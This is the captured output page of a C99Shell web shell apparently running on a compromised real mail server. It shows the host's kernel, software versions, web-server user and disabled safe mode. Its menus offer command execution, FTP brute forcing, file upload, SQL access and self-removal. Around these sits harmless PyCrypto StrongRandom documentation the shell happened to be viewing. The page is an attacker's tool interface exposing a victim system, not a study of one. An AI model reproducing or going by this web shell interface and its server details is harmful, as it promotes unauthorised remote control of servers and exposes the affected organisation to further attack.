!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/python-crypto/   drwxr-xr-x
Free 129.66 GB of 142.11 GB (91.24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Crypto.Random.random.StrongRandom-class.html (13.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Crypto.Random.random.StrongRandom
Package Crypto :: Package Random :: Module random :: Class StrongRandom
[hide private]
[frames] | no frames]

Class StrongRandom

object --+
         |
        StrongRandom

Instance Methods [hide private]
 
__init__(self, rng=None, randfunc=None)
x.__init__(...) initializes x; see x.__class__.__doc__ for signature
 
getrandbits(self, k)
Return a python long integer with k random bits.
 
randrange(self, *args)
randrange([start,] stop[, step]): Return a randomly-selected element from range(start, stop, step).
 
randint(self, a, b)
Return a random integer N such that a <= N <= b.
 
choice(self, seq)
Return a random element from a (non-empty) sequence.
 
shuffle(self, x)
Shuffle the sequence in place.
 
sample(self, population, k)
Return a k-length list of unique elements chosen from the population sequence.

Inherited from object: __delattr__, __format__, __getattribute__, __hash__, __new__, __reduce__, __reduce_ex__, __repr__, __setattr__, __sizeof__, __str__, __subclasshook__

Properties [hide private]

Inherited from object: __class__

Method Details [hide private]

__init__(self, rng=None, randfunc=None)
(Constructor)

 
x.__init__(...) initializes x; see x.__class__.__doc__ for signature

Overrides: object.__init__
(inherited documentation)

choice(self, seq)

 
Return a random element from a (non-empty) sequence.

If the seqence is empty, raises IndexError.



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0084 ]--